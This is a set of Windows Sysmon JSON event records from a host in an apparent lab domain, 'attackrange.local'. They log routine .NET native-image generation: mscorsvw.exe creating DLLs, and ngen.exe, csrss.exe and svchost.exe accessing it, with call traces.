{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7198,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:47.699\r\nProcessGuid: {A837DB8D-0497-5F25-0000-0010E1480F00}\r\nProcessId: 2856\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b28-0\\PresentationFramework.Luna.dll\r\nCreationUtcTime: 2020-08-01 05:58:47.699","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:47.699","ProcessGuid":"{A837DB8D-0497-5F25-0000-0010E1480F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b28-0\\PresentationFramework.Luna.dll","CreationUtcTime":"2020-08-01 05:58:47.699","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7199,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.730\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-0010E84D0F00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.730","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-0010E84D0F00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7200,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.730\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-0010E84D0F00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.730","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-0010E84D0F00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7201,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.746\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-0010E84D0F00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.746","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-0010E84D0F00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7202,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.793\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-001087510F00}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.793","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-001087510F00}","TargetProcessId":"3388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7203,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.793\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-001087510F00}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.793","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-001087510F00}","TargetProcessId":"3388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7204,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.793\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-001087510F00}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.793","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-001087510F00}","TargetProcessId":"3388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7205,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:48.058\r\nProcessGuid: {A837DB8D-0497-5F25-0000-001087510F00}\r\nProcessId: 3388\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d3c-0\\PresentationFramework.Royale.dll\r\nCreationUtcTime: 2020-08-01 05:58:48.058","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:48.058","ProcessGuid":"{A837DB8D-0497-5F25-0000-001087510F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d3c-0\\PresentationFramework.Royale.dll","CreationUtcTime":"2020-08-01 05:58:48.058","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7206,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:48.105\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0498-5F25-0000-001069560F00}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:48.105","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0498-5F25-0000-001069560F00}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0